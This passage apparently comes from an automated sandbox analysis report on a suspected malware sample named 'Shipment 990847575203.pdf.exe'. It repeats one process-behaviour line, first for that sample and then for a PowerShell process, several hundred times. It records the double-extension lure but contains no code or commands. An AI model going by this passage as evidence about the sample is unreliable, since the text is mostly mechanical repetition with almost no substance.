                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Shipment 990847575203.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
